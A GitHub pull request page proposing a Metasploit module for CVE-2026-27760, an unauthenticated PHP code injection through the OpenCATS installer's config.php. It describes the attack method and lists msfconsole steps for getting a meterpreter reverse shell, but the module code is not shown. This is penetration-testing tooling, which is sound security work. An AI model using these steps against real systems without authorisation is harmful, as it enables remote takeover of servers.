Skip to content

Add OpenCATS installer PHP code injection module (CVE-2026-27760)#21630

Open
stlthr4k3r wants to merge 1 commit into
rapid7:masterfrom
stlthr4k3r:add-opencats-installer-rce
Open

Add OpenCATS installer PHP code injection module (CVE-2026-27760)#21630
stlthr4k3r wants to merge 1 commit into
rapid7:masterfrom
stlthr4k3r:add-opencats-installer-rce

Conversation

@stlthr4k3r

Copy link
Copy Markdown

This module exploits CVE-2026-27760, a PHP code injection in OpenCATS. The installer endpoint takes user input and writes it straight into config.php without sanitising it, so if the installation wasn't completed you can inject arbitrary PHP code that runs on every page load after that. No credentials needed.

The module injects the payload, waits until it's actually live (it checks in a loop so it handles OPcache gracefully regardless of how the server is configured), triggers it, then restores config.php afterwards.

Worth mentioning that this does require the INSTALL_BLOCK file to be absent, so it only affects instances where the wizard was never finished. Probably not many of those around but the vulnerability is real and patched.

Documentation and a Docker lab setup are included. Tested with php/meterpreter/reverse_tcp and linux/x64/meterpreter/reverse_tcp against OpenCATS 0.9.7.4.

New to this, any and all help appreciated. TIA (:

Verification

msfconsole
use exploit/multi/http/opencats_installer_rce
set RHOSTS
set RPORT
set LHOST <attacker_ip>
check → should report Vulnerable
set payload php/meterpreter/reverse_tcp + exploit → PHP meterpreter session
set target 3 + set payload linux/x64/meterpreter/reverse_tcp + exploit → meterpreter via CmdStager
Confirm config.php is restored after the session
Full docs at documentation/modules/exploit/multi/http/opencats_installer_rce.md

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

Status: Todo

Development

Successfully merging this pull request may close these issues.

2 participants